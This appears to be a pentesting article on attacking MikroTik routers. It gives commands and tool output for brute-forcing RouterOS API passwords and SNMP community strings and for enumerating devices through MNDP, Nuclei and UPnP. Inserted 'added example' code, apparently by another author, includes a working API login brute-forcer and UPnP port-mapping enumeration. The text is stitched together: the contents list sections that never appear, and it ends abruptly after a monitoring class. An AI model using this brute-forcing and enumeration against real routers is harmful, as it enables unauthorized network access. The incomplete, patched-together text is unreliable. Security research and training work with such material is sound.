Against: Pentesting MikroTik Routers

The use of MikroTik routers is widespread around the world and their security is an issue. This is a release of my article on attacks on MikroTik routers.

Caster - Against

Genre: Offensive, Experimental
Label: exploit.org
Release Date: 27.09.2024

Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, 1/160 sec, f/2.8, ISO 1250)

Intro

This article is a case study focusing on experimental methods applied to MikroTik networking equipment. The importance of network hardware security cannot be overemphasized, as it is a key element of the infrastructure on which the stability and protection of the entire network depends. When I wrote Against, I tried to demonstrate how configuration flaws can become attack vectors, and how pentesters can exploit these vulnerabilities to gain access to network infrastructure.

Disclaimer

All methods and techniques described in this article are for educational purposes only. The author and publication are not responsible for misuse of this knowledge. Using these techniques without the permission of the owners of the network equipment is illegal and violates the laws of most countries. The article is intended to raise awareness of network device security and is also useful for pentesters who are investigating vulnerabilities to protect infrastructure. Remember that this knowledge should only be used for ethical purposes. Don't risk your life and be careful.

Table of Contents

1. Intro
2. Disclaimer
3. RouterOS API Bruteforce
   3.1 Why you need RouterOS API?
   3.2 Bruteforce
4. MikroTik Hardware Search
   4.1 Discovery Protocols
   4.2 SNMP
       4.2.1 How SNMP is usually abused?
       4.2.2 Example of SNMP port search
       4.2.3 SNMP Bruteforce
       4.2.4 SNMP Enumeration with Metasploit
   4.3 Nuclei
       4.3.1 Why should you use Nuclei?
       4.3.2 Example
   4.4 UPnP Scanning
5. Absence of some security features
   5.1 DAI
   5.2 Storm Control
   5.3 VACL
6. Metasploit: Winbox Credentials Extractor
   6.1 How this post-exploitation module works
7. PMKID Attack on MikroTik Routers
   7.1 Attack Equipment
   7.2 PMKID Attack Example
       7.2.1 Stage 1
       7.2.2 Stage 2
       7.2.3 Stage 3
   7.3 PMKID Outro
8. Sara
   8.1 Why is configuration analysis important?
   8.2 Tool Installation
   8.3 Config Analyzing
   8.4 Analysis of the conclusion
   8.5 Sara Outro
9. Pivoting
   9.1 SOCKS
       9.1.1 How it's gonna work
       9.1.2 SOCKS Pivoting Map
       9.1.3 SOCKS Pivoting
       9.1.4 Socks Outro
   9.2 SSH Dynamic Port Forwarding
       9.2.1 SSH DPF Pivoting Map
       9.2.2 Outro
10. RouterOS Post-Exploitation
    10.1 Scans on Hardware: IP Scan
    10.2 ARP Table
    10.3 DNS Cache
    10.4 Addressing Enumeration
    10.5 Interfaces
11. Outro

RouterOS API Bruteforce

Yes, I realize that brute force against network hardware (SSH or Telnet) is a noisy, well-known technique. But there are times when the API service is overlooked by the system administrator: it is often left listening on all interfaces, which gives an attacker a way onto the equipment. As a result, an attacker can brute-force credentials through the API and gain control of the device.

The whole point is that the accounts on the hardware can be brute-forced through the API, not only through SSH or Telnet.

The fact that the default account on RouterOS is named admin makes brute forcing easier for the attacker: only the password has to be guessed.

Why you need RouterOS API?

The API on MikroTik devices exposes the same management and configuration functionality as the CLI. Administrators use it for automation and integration with third-party tools. However, if the API is left unchecked (weak passwords, no address restrictions), it becomes the target of a brute-force attack whose prize is a login and password for device management.

Often administrators leave the API open because they use it to automate tasks or integrate with other systems:

  • Either the API is actually in use and access to it is not filtered;
  • Or an attacker can take advantage of the fact that the API service is active by default.

The API listens on TCP/8728 (api) and TCP/8729 (api-ssl) and is enabled by default. To find it on hardware, just use a port scanner such as nmap or masscan:

caster@kali:~$ sudo nmap -n -p 8728,8729 192.168.0.254
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 16:02 +05
Nmap scan report for 192.168.0.254
PORT     STATE SERVICE
8728/tcp open  api
8729/tcp open  api-ssl
In my case the lab MikroTik uses the address 192.168.0.254 on the 192.168.0.0/24 subnet.

Bruteforce

The MikrotikAPI-BF tool can be used to attack the RouterOS API. It is written specifically to brute-force logins and passwords on MikroTik devices with the API exposed. Such tools are freely available on the web, which makes life much easier for attackers, especially when devices keep the standard login and a weak password.

This makes securing the device critical: without access filtering, and with a weak password, an attacker gains control of the device with little effort. Administrators should recognize the risk and take steps to protect their devices, including filtering API access and using strong passwords.

caster@kali:~$ git clone https://github.com/mrhenrike/MikrotikAPI-BF
caster@kali:~$ cd MikrotikAPI-BF
caster@kali:~/MikrotikAPI-BF$ python3 mikrotikapi-bf.py -h

        __  __ _ _              _   _ _        _    ____ ___      ____  _____
        |  \/  (_) | ___ __ ___ | |_(_) | __   / \  |  _ \_ _|    | __ )|  ___|
        | |\/| | | |/ / '__/ _ \| __| | |/ /  / _ \ | |_) | |_____|  _ \| |_
        | |  | | |   <| | | (_) | |_| |   <  / ___ \|  __/| |_____| |_) |  _|
        |_|  |_|_|_|\_\_|  \___/ \__|_|_|\_\/_/   \_\_|  |___|    |____/|_|


                    Mikrotik RouterOS API Bruteforce Tool 1.1
                            André Henrique (@mrhenrike)
          Please report tips, suggests and problems to Twitter (@mrhenrike)
                    https://github.com/mrhenrike/MikrotikAPI-BF
       

    NAME
    	 mikrotikapi-bf.py - Brute force attack tool on Mikrotik box credentials exploiting API requests

    USAGE
    	 python mikrotikapi-bf.py [-t] [-p] [-u] [-d] [-s] [-q] [-a]

    OPTIONS
    	 -t, --target 		 RouterOS target
    	 -p, --port 		 RouterOS port (default 8728)
    	 -u, --user 		 User name (default admin)
    	 -h, --help 		 This help
    	 -d, --dictionary 	 Password dictionary
    	 -s, --seconds 		 Delay seconds between retry attempts (default 1)
    	 -q, --quiet 		 Quiet mode
    	 -a, --autosave 		 Automatically save current progress to file, and read from it on startup

    EXAMPLE
    	 python3 mikrotikapi-bf.py -t 192.168.0.200 -u manager -p 1337 -d /tmp/passwords.txt -s 5
    	 python3 mikrotikapi-bf.py -t 192.168.0.1 -d /tmp/passwords.txt
    	 python3 mikrotikapi-bf.py -t 192.168.0.1 -d /tmp/passwords.txt -a /tmp/autosave.json

Trying to bruteforce the password:

caster@kali:~/MikrotikAPI-BF$ python3 mikrotikapi-bf.py -t 192.168.0.254 -u desire -d passwordsprediction

        __  __ _ _              _   _ _        _    ____ ___      ____  _____
        |  \/  (_) | ___ __ ___ | |_(_) | __   / \  |  _ \_ _|    | __ )|  ___|
        | |\/| | | |/ / '__/ _ \| __| | |/ /  / _ \ | |_) | |_____|  _ \| |_
        | |  | | |   <| | | (_) | |_| |   <  / ___ \|  __/| |_____| |_) |  _|
        |_|  |_|_|_|\_\_|  \___/ \__|_|_|\_\/_/   \_\_|  |___|    |____/|_|


                    Mikrotik RouterOS API Bruteforce Tool 1.1
                            André Henrique (@mrhenrike)
          Please report tips, suggests and problems to Twitter (@mrhenrike)
                    https://github.com/mrhenrike/MikrotikAPI-BF
       
[*] Starting bruteforce attack...
---------------------------------
[-] Trying with default credentials on RouterOS...
[-] Default RouterOS credentials were unsuccessful, trying with 6 passwords in list...

[-] Trying 1 of 6 Passwords - Current: admin
[-] Trying 2 of 6 Passwords - Current: clona
[-] Trying 3 of 6 Passwords - Current: zetta
[-] Trying 4 of 6 Passwords - Current: thebalance
[+] Login successful!!! User: desire Password: thebalance
__________________________________________
Elapsed Time: 4.2 sec | Passwords Tried: 4

In the end the API brute force succeeded and we recovered the desire:thebalance account. Administrators should disable the API when it is not in use, or restrict it to trusted addresses (the address field of the service in /ip service), and enforce strong passwords.
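To show what a tool like MikrotikAPI-BF actually sends on the wire, here is an added example (my own code, not the article's and not part of MikrotikAPI-BF) of the RouterOS API login exchange: the length-prefixed word framing, the clear-text login used by RouterOS 6.43 and newer, and the fallback to the older MD5 challenge-response when a router answers with =ret=. The FakeRouter class is a constructed stand-in so the example runs offline; against a real device you would pass socket.create_connection((host, 8728)).makefile("rwb") instead.

```python
# Added example: RouterOS API login exchange driven by a password list.
# Not part of the article or of MikrotikAPI-BF. FakeRouter is a constructed stand-in.
import hashlib
import io

def encode_length(n):
    """Length prefix of one API word (RouterOS API framing)."""
    if n < 0x80:
        return bytes([n])
    if n < 0x4000:
        return (n | 0x8000).to_bytes(2, "big")
    if n < 0x200000:
        return (n | 0xC00000).to_bytes(3, "big")
    if n < 0x10000000:
        return (n | 0xE0000000).to_bytes(4, "big")
    return b"\xf0" + n.to_bytes(4, "big")

def decode_length(stream):
    first = stream.read(1)[0]
    if first < 0x80:
        return first
    if first < 0xC0:
        return ((first & 0x3F) << 8) | stream.read(1)[0]
    if first < 0xE0:
        return ((first & 0x1F) << 16) | int.from_bytes(stream.read(2), "big")
    if first < 0xF0:
        return ((first & 0x0F) << 24) | int.from_bytes(stream.read(3), "big")
    return int.from_bytes(stream.read(4), "big")

def encode_sentence(words):
    """A sentence is a run of length-prefixed words ended by a zero-length word."""
    return b"".join(encode_length(len(w.encode())) + w.encode() for w in words) + b"\x00"

def read_sentence(stream):
    words = []
    while True:
        n = decode_length(stream)
        if n == 0:
            return words
        words.append(stream.read(n).decode())

def decode_sentence(data):
    return read_sentence(io.BytesIO(data))

def login(conn, user, password):
    """RouterOS >= 6.43 accepts the password in clear inside the sentence. An older
    router ignores it and answers !done =ret=<challenge>; then the client must send
    =response=00 + MD5(0x00 || password || challenge). Returns True on !done."""
    conn.write(encode_sentence(["/login", f"=name={user}", f"=password={password}"]))
    conn.flush()
    reply = read_sentence(conn)
    if not reply or reply[0] != "!done":
        return False  # !trap =message=invalid user name or password (6)
    ret = [w for w in reply if w.startswith("=ret=")]
    if not ret:
        return True
    challenge = bytes.fromhex(ret[0][5:])
    digest = hashlib.md5(b"\x00" + password.encode() + challenge).hexdigest()
    conn.write(encode_sentence(["/login", f"=name={user}", f"=response=00{digest}"]))
    conn.flush()
    reply = read_sentence(conn)
    return bool(reply) and reply[0] == "!done"

def bruteforce(connect, user, wordlist):
    """One fresh connection per candidate (the router may close the session after a failure)."""
    for candidate in wordlist:
        if login(connect(), user, candidate):
            return candidate
    return None

class FakeRouter:
    """Constructed stand-in for the API listener on TCP/8728 (not RouterOS code):
    validates a login the way the service does, in plain or legacy challenge mode."""
    CHALLENGE = bytes(range(16))
    TRAP = ["!trap", "=message=invalid user name or password (6)"]

    def __init__(self, users, legacy=False):
        self.users, self.legacy, self.out = users, legacy, io.BytesIO()

    def write(self, data):
        words = decode_sentence(data)
        attrs = dict(w[1:].split("=", 1) for w in words[1:])
        pw = self.users.get(attrs.get("name"))
        if self.legacy and "response" not in attrs:
            reply = ["!done", "=ret=" + self.CHALLENGE.hex()]
        elif "response" in attrs:
            expected = "00" + hashlib.md5(b"\x00" + (pw or "").encode() + self.CHALLENGE).hexdigest()
            reply = ["!done"] if pw is not None and attrs["response"] == expected else self.TRAP
        else:
            reply = ["!done"] if pw is not None and attrs.get("password") == pw else self.TRAP
        self.out = io.BytesIO(encode_sentence(reply))

    def flush(self):
        pass

    def read(self, n):
        return self.out.read(n)

if __name__ == "__main__":
    router = lambda: FakeRouter({"desire": "thebalance"})
    print(bruteforce(router, "desire", ["admin", "clona", "zetta", "thebalance"]))
```

Each attempt costs the attacker one TCP connection and one or two sentences, which is why an unfiltered API is such a cheap target and why the address restriction on the service matters more than any rate limit the tool applies.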

MikroTik Hardware Search

In this section, I will show you various techniques and tools that you can use to find MikroTik devices on your network. This step is critical in infrastructure attacks because it allows you to identify devices and get information about available services.

Discovery Protocols

Discovery protocols are network protocols that let devices on a local network find each other. They are often used to automatically discover routers, switches, servers and other devices. On MikroTik devices, LLDP (Link Layer Discovery Protocol), CDP (Cisco Discovery Protocol) and MNDP (MikroTik Neighbor Discovery Protocol) can be active and announce information about the device and the network infrastructure. LLDP and CDP are link-layer multicast frames; MNDP is broadcast over UDP port 5678.

These protocols are often left enabled for ease of network management, since they simplify device configuration and diagnostics. On RouterOS, neighbor discovery is enabled by default (/ip neighbor discovery-settings, with cdp, lldp and mndp all active), so the announcements are sent on every interface in the discovery interface list.

Attack example:

To detect and process the traffic of these protocols, the Above tool can be used: it listens on an interface for the given number of seconds and reports the discovery frames it sees. More detailed packet analysis can be performed in Wireshark.

caster@kali:~$ sudo above --interface eth0 --timer 450
MNDP and LLDP frames (L2)

Device discovery protocols are thus a powerful tool for an attacker because they can reveal critical information about network infrastructure and devices. Using tools such as Above and Wireshark, it is possible to quickly gather data about network topology and vulnerable devices, which is one of the first steps in pentesting the internal infrastructure.
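As an added example (my own code, not the article's and not part of Above), here is a decoder for the MNDP datagrams RouterOS broadcasts to UDP port 5678, so you can see exactly which fields a single frame leaks: identity, RouterOS version, board model, uptime, interface name and addresses. The TLV type numbers are the ones used by the Wireshark MNDP dissector; the header layout (two unknown bytes, then a sequence number) and the little-endian uptime follow the same source. The sample datagram is constructed here, not a real capture; listen() is for live use and is not exercised offline.

```python
# Added example: MNDP (UDP/5678) datagram decoder. Not from the article or from Above.
# TLV types and header layout as in the Wireshark MNDP dissector; sample is constructed.
import socket
import struct

MNDP_PORT = 5678
TLV_NAMES = {
    1: "mac-address", 5: "identity", 7: "version", 8: "platform", 10: "uptime",
    11: "software-id", 12: "board", 14: "unpack", 15: "ipv6-address",
    16: "interface-name", 17: "ipv4-address",
}

def parse_mndp(payload):
    """4-byte header (2 unknown bytes + 2-byte sequence number), then TLVs of
    2-byte type, 2-byte length and value, all big-endian except the uptime value."""
    if len(payload) < 4:
        raise ValueError("too short for MNDP")
    info = {"seqno": struct.unpack("!H", payload[2:4])[0]}
    pos = 4
    while pos + 4 <= len(payload):
        ttype, tlen = struct.unpack("!HH", payload[pos:pos + 4])
        value = payload[pos + 4:pos + 4 + tlen]
        if len(value) != tlen:
            raise ValueError("truncated TLV")
        pos += 4 + tlen
        name = TLV_NAMES.get(ttype, f"type-{ttype}")
        if ttype == 1 and tlen == 6:
            info[name] = ":".join(f"{b:02x}" for b in value)
        elif ttype == 10 and tlen == 4:
            info[name] = struct.unpack("<I", value)[0]  # seconds, little-endian
        elif ttype == 17 and tlen == 4:
            info[name] = socket.inet_ntoa(value)
        elif ttype == 15 and tlen == 16:
            info[name] = socket.inet_ntop(socket.AF_INET6, value)
        elif ttype == 14:
            info[name] = value.hex()
        else:
            info[name] = value.decode("utf-8", "replace")
    return info

def build_mndp(seqno, tlvs):
    """Build a datagram from (type, value bytes) pairs; used to construct the sample."""
    body = b"".join(struct.pack("!HH", t, len(v)) + v for t, v in tlvs)
    return b"\x00\x00" + struct.pack("!H", seqno) + body

# Constructed sample of what a RouterOS device advertises (not a real capture).
SAMPLE = build_mndp(7, [
    (1, bytes.fromhex("48a98a010203")),
    (5, b"MikroTik"),
    (7, b"7.15.3 (stable)"),
    (8, b"MikroTik"),
    (10, struct.pack("<I", 86400)),
    (12, b"C52iG-5HaxD2HaxD"),
    (16, b"bridge"),
    (17, socket.inet_aton("192.168.0.254")),
])

def listen(bind_ip="0.0.0.0", timeout=30.0):
    """Live use only: receive MNDP broadcasts for `timeout` seconds and print each neighbour."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((bind_ip, MNDP_PORT))
    sock.settimeout(timeout)
    try:
        while True:
            data, (src, _) = sock.recvfrom(2048)
            print(src, parse_mndp(data))
    except socket.timeout:
        pass

if __name__ == "__main__":
    print(parse_mndp(SAMPLE))
```

The version and board fields are what make MNDP useful to an attacker: they give the exact RouterOS release to search advisories for, without a single packet sent to the device.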

SNMP

SNMP (Simple Network Management Protocol) - is a protocol that is widely used to monitor and manage network devices. It gives the administrator access to key information about the device's operation, such as CPU usage, memory status, routing tables and many other parameters. MikroTik devices support SNMP and can be configured to work with this protocol.

How SNMP is usually abused?

In practice, it is common to see SNMP configured with the standard community strings public and private. These strings give read access to the device's data (and, if the community has write access, the ability to change settings), which lets an attacker gather critical information about the configuration and state of the device. SNMP also reveals the firmware version, the device model and other parameters that help an attacker plan the next steps.

First, to find devices on the network that speak SNMP, you can use nmap to look for an open UDP port 161 (the standard SNMP port). Example of a network search:

caster@kali:~$ sudo nmap -sU -p 161 192.168.0.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 16:15 +05
Nmap scan report for 192.168.0.254
Host is up (0.0047s latency).
PORT    STATE SERVICE
161/udp open  snmp

This query will help identify devices that are using SNMP by scanning the subnet for an open port.

SNMP Bruteforce

Once a device with active SNMP is found, you can try to brute-force the community strings to gain access to its data. One popular tool for this is onesixtyone, which sends an SNMP GET for sysDescr with each candidate string and prints the strings the device answers.

This command tries every community string in the snmp.txt dictionary against the target:

caster@kali:~$ sudo onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.0.254
Scanning 1 hosts, 3219 communities
192.168.0.254 [public] RouterOS C52iG-5HaxD2HaxD
192.168.0.254 [private] RouterOS C52iG-5HaxD2HaxD
192.168.0.254 [private] RouterOS C52iG-5HaxD2HaxD
192.168.0.254 [public] RouterOS C52iG-5HaxD2HaxD

Once a valid string is found, the attacker can pull detailed information from the device, for example with Metasploit.

SNMP Enumeration with Metasploit

Besides using bruteforce tools, you can perform more detailed SNMP enumeration using the snmp_enum module in the Metasploit Framework. This module allows you to get detailed information about the device, such as interface list, routing tables, firmware versions and other important parameters.

caster@kali:~$ msfconsole
msf6 > use auxiliary/scanner/snmp/snmp_enum 
msf6 auxiliary(scanner/snmp/snmp_enum) > 

The following must be specified:

  • RHOSTS - the address of the target router;
  • COMMUNITY - the string detected by the attacker, in my case it is public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.0.254
RHOSTS => 192.168.0.254
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
COMMUNITY => public

Then start the module:

msf6 auxiliary(scanner/snmp/snmp_enum) > run

In addition to uptime and system name, SNMP returns the device model, the addresses in use, the interface list and more.

Thus, SNMP remains one of the most vulnerable protocols when misconfigured, especially if standard community strings are used or access to the SNMP service is not filtered in any way. Having such access can provide an attacker with detailed information about the device, its configuration and state, which can help to plan and execute further attacks.

Nuclei

Nuclei - is a powerful template-based vulnerability and exploit search tool. It can be used to automatically search for known vulnerabilities on devices including MikroTik RouterOS. Nuclei supports various templates for finding vulnerabilities such as open APIs, outdated software versions, and can also detect access to administration panels via HTTP/HTTPS on MikroTik devices.

Why should you use Nuclei?

Nuclei effectively automates the vulnerability detection process, making it fast and convenient. In the case of MikroTik RouterOS, Nuclei templates allow you to find open APIs, legacy FTP servers, SSH services, and even access to administrative interfaces (www)

Examples of templates for MikroTik:

network/detection/mikrotik-ssh-detect.yaml
network/detection/mikrotik-ftp-server-detect.yaml
network/detection/mikrotik-routeros-api.yaml
http/exposed-panels/mikrotik/mikrotik-routeros.yaml
http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml

These templates allow you to automate the process of finding vulnerabilities, which is especially useful when conducting security testing of an infrastructure with multiple devices.

Example

To use Nuclei templates, specify a file with a list of targets (-l, one target per line; here the file is simply named test) and the desired templates (-t). For example, to search for open APIs on MikroTik devices with the mikrotik-routeros-api.yaml template, the command looks as follows:

caster@kali:~$ nuclei -l test -t .local/nuclei-templates/network/detection/mikrotik-routeros-api.yaml
      __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.9

		projectdiscovery.io

[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v10.0.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 255
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[mikrotik-routeros-api] [tcp] [info] 192.168.0.254:8728

The result shows that the target device at 192.168.0.254 has the MikroTik RouterOS API service open on the TCP/8728 port.

Nuclei can be easily integrated into automated security testing processes, thanks to its support for templates for different types of vulnerabilities.

UPnP Scanning

UPnP (Universal Plug and Play) is a protocol that allows devices on a network to automatically discover each other and forward ports without user intervention. On MikroTik devices, UPnP can be enabled to forward ports automatically, which makes it a potential entry point for attacks.
If UPnP is not properly configured or filtered, an attacker can obtain sensitive information about the device and its configuration. The SSDP reply reveals the RouterOS version and the URL of the device description XML; from that description the attacker obtains the control URL of the WANIPConnection service and can enumerate the existing port forwards, which can be used for further attacks.

To find out if UPnP is active on a device, you can use the upnp-info script in nmap to extract information about a running UPnP service. Example command for scanning:

caster@kali:~$ sudo nmap -n -sU -p 1900 192.168.0.0/24 --script upnp-info

The scan output can show the RouterOS version and the path to the XML file containing the port forwarding information. It looks something like this:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 10:22 +05

Nmap scan report for 192.168.0.254
Host is up (0.012s latency).

PORT STATE SERVICE
1900/udp open upnp
| upnp-info: 
| 192.168.0.254
| Server: RouterOS/7.15.3UPnP/1.0 MikroTik UPnP/1.0
|_ Location: http://192.168.0.254:2828/gateway_description.xml

With this script you get the URL of the description XML, which lists the device type, its services and their control URLs; calling the GetGenericPortMappingEntry action of the WANIPConnection service through one of those control URLs returns the port mappings, including the internal addresses of the hosts behind them.

The mappings only exist if there are hosts on the network that actually use UPnP. Typically these are IoT devices, cameras and similar equipment.

But you might have paid attention to:

RouterOS/7.15.3UPnP/1.0 MikroTik UPnP/1.0

The RouterOS version on this device is 7.15.3. UPnP scanning thus identified a MikroTik device that an attacker can start developing attacks against, and the exact RouterOS version can be used to look up known vulnerabilities specific to that release.
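To make the UPnP exchange concrete, here is an added example (my own code, not the article's and not nmap's upnp-info script) covering the three steps: the SSDP M-SEARCH and the reply that carries the RouterOS version, the lookup of the WANIPConnection control URL in the description XML, and the SOAP GetGenericPortMappingEntry request that enumerates port forwards. The SSDP reply, description XML and SOAP response below are constructed to mirror the article's scan output; the device UUID, control URL and mapping values are assumptions. discover() needs a real network and is not exercised offline.

```python
# Added example: SSDP discovery and UPnP port-mapping enumeration against an IGD such as
# RouterOS. Not from the article or nmap. All sample messages below are constructed.
import re
import socket
import xml.etree.ElementTree as ET

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900
UPNP_NS = "urn:schemas-upnp-org:device-1-0"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"

def msearch_request(st="upnp:rootdevice", mx=2):
    return (f"M-SEARCH * HTTP/1.1\r\nHOST: {SSDP_ADDR}:{SSDP_PORT}\r\n"
            f'MAN: "ssdp:discover"\r\nMX: {mx}\r\nST: {st}\r\n\r\n').encode()

def parse_ssdp_response(data):
    """Headers of a 200 OK SSDP reply (lower-case keys). Adds 'routeros' when the
    Server header carries a RouterOS/<version> token, as in the article's output."""
    lines = data.decode("utf-8", "replace").split("\r\n")
    if not lines[0].startswith("HTTP/1.1 200"):
        raise ValueError("not an SSDP 200 OK reply")
    headers = {}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip().lower()] = value.strip()
    m = re.search(r"RouterOS/(\d+(?:\.\d+)+)", headers.get("server", ""))
    if m:
        headers["routeros"] = m.group(1)
    return headers

def discover(timeout=2.0):
    """Live use only: multicast an M-SEARCH and collect replies until the socket times out."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(msearch_request(), (SSDP_ADDR, SSDP_PORT))
    found = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(4096)
            found.append((src, parse_ssdp_response(data)))
    except socket.timeout:
        return found

def control_url(description_xml, service_type=WANIP):
    """Control URL of a service, read from the LOCATION description XML."""
    for svc in ET.fromstring(description_xml).iter(f"{{{UPNP_NS}}}service"):
        if svc.findtext(f"{{{UPNP_NS}}}serviceType") == service_type:
            return svc.findtext(f"{{{UPNP_NS}}}controlURL")
    return None

def port_mapping_request(index):
    """SOAP body for GetGenericPortMappingEntry. POST it to the control URL with the header
    SOAPAction: "<service type>#GetGenericPortMappingEntry" for index 0, 1, 2, ... until
    the device answers with a SOAP fault: that walk lists every mapping."""
    return ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            f'<u:GetGenericPortMappingEntry xmlns:u="{WANIP}">'
            f"<NewPortMappingIndex>{index}</NewPortMappingIndex>"
            "</u:GetGenericPortMappingEntry></s:Body></s:Envelope>").encode()

def parse_port_mapping(soap_xml):
    """Fields of one GetGenericPortMappingEntry response, keyed by element name."""
    wanted = {"NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
              "NewInternalClient", "NewPortMappingDescription"}
    return {e.tag.split("}")[-1]: (e.text or "")
            for e in ET.fromstring(soap_xml).iter() if e.tag.split("}")[-1] in wanted}

# Constructed samples (not real captures); the Server line copies the article's scan output.
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nEXT:\r\n"
                b"LOCATION: http://192.168.0.254:2828/gateway_description.xml\r\n"
                b"SERVER: RouterOS/7.15.3UPnP/1.0 MikroTik UPnP/1.0\r\n"
                b"ST: upnp:rootdevice\r\nUSN: uuid:assumed-router-uuid::upnp:rootdevice\r\n\r\n")
SAMPLE_DESCRIPTION = f"""<root xmlns="{UPNP_NS}"><device>
<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
<friendlyName>MikroTik Router</friendlyName><deviceList><device>
<deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType><deviceList><device>
<deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType><serviceList>
<service><serviceType>{WANIP}</serviceType><controlURL>/upnp/control/WANIPConnection</controlURL>
</service></serviceList></device></deviceList></device></deviceList></device></root>"""
SAMPLE_MAPPING = f"""<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
<u:GetGenericPortMappingEntryResponse xmlns:u="{WANIP}"><NewRemoteHost></NewRemoteHost>
<NewExternalPort>8080</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>80</NewInternalPort>
<NewInternalClient>192.168.0.23</NewInternalClient><NewEnabled>1</NewEnabled>
<NewPortMappingDescription>camera</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration>
</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>"""

if __name__ == "__main__":
    print(parse_ssdp_response(SAMPLE_REPLY)["routeros"], control_url(SAMPLE_DESCRIPTION))
    print(parse_port_mapping(SAMPLE_MAPPING))
```

Note that the SOAP call is an unauthenticated HTTP POST: any host that can reach the description URL can list, and with AddPortMapping also create, forwards, which is the reason UPnP on the LAN side of a router is a finding in its own right.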

Absence of some security features

MikroTik devices running RouterOS and SwitchOS lack the switch-level security mechanisms that enterprise switches ship with, such as DAI, Storm Control and VACL. These features play a key role in protecting networks from attacks including ARP spoofing, IP spoofing and uncontrolled access between VLANs. Their absence greatly increases the risk to the infrastructure, giving attackers more room to attack and manipulate traffic inside the network.

DAI

DAI (Dynamic ARP Inspection) is a technology that prevents ARP spoofing by validating ARP requests and responses against a table of known IP-to-MAC bindings. Without DAI, an attacker can perform ARP spoofing and intercept traffic inside the network with a Man-in-the-Middle attack, which can lead to data leakage and unauthorized access to resources. The closest substitute RouterOS offers is static ARP entries combined with arp=reply-only on the interface, which is rarely configured in practice.

Storm Control

Storm Control is a mechanism that limits the rate of broadcast and multicast frames, preventing broadcast storms that can overload a network. Without it, an attacker can flood a segment and take down part of the network or the whole segment. Storm Control thresholds would also help to notice unauthorized port scans, since the scanners pentesters use are very fast and emit bursts of ARP and probe traffic while scanning hosts in random order.

VACL

VACL (VLAN Access Control List) filters traffic within a VLAN, providing finer-grained control over which hosts in a segment may talk to each other and to other segments. Without VACLs, an attacker who gets a foothold in a VLAN can reach every other host in it freely and probe the boundaries of segments that were supposed to be isolated.
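Since the hardware will not do it, the two checks DAI and Storm Control would perform can at least be done passively by a sensor on a mirror port. The following added example (my own code, not the article's) tracks IP-to-MAC bindings from ARP replies, starting from a trusted static entry for the gateway as DAI's binding table would, and counts broadcast frames per source MAC in a sliding window as a storm-control threshold would. The frame stream is constructed: the real gateway answers, an attacker poisons the gateway's IP, then floods ARP-request broadcasts while scanning the /24. The MAC addresses and threshold values are assumptions.

```python
# Added example: passive ARP-binding and broadcast-rate checks over a constructed frame stream.
# Not from the article. Bindings, MACs and thresholds below are assumptions.
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

class L2Monitor:
    """Binding table (IP -> MAC) fed by ARP replies, like DAI, plus a per-source
    sliding-window count of broadcast frames, like a storm-control threshold."""

    def __init__(self, static_bindings=None, bcast_limit=100, window=1.0):
        self.bindings = dict(static_bindings or {})  # trusted entries, e.g. the gateway
        self.bcast = defaultdict(deque)               # src MAC -> timestamps of broadcasts
        self.storming = set()
        self.limit, self.window = bcast_limit, window
        self.alerts = []

    def observe(self, frame):
        """frame: {'ts', 'src', 'dst', optional 'arp': {'op', 'sender_ip', 'sender_mac'}}."""
        ts, src, dst = frame["ts"], frame["src"].lower(), frame["dst"].lower()
        arp = frame.get("arp")
        if arp and arp["op"] == "reply":
            self._check_binding(ts, arp["sender_ip"], arp["sender_mac"].lower(), src)
        if dst == BROADCAST:
            self._check_storm(ts, src)

    def _check_binding(self, ts, ip, sender_mac, src):
        if sender_mac != src:  # DAI also drops replies whose ARP sender MAC != Ethernet source
            self.alerts.append(("arp-mac-mismatch", ts, ip, src, sender_mac))
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = sender_mac  # first claim wins, as with a learned entry
        elif known != sender_mac:
            self.alerts.append(("arp-binding-conflict", ts, ip, known, sender_mac))

    def _check_storm(self, ts, src):
        q = self.bcast[src]
        q.append(ts)
        while ts - q[0] > self.window:
            q.popleft()
        if len(q) > self.limit and src not in self.storming:
            self.storming.add(src)  # alert once per burst, not once per frame
            self.alerts.append(("broadcast-storm", ts, src, len(q)))
        elif len(q) <= self.limit:
            self.storming.discard(src)

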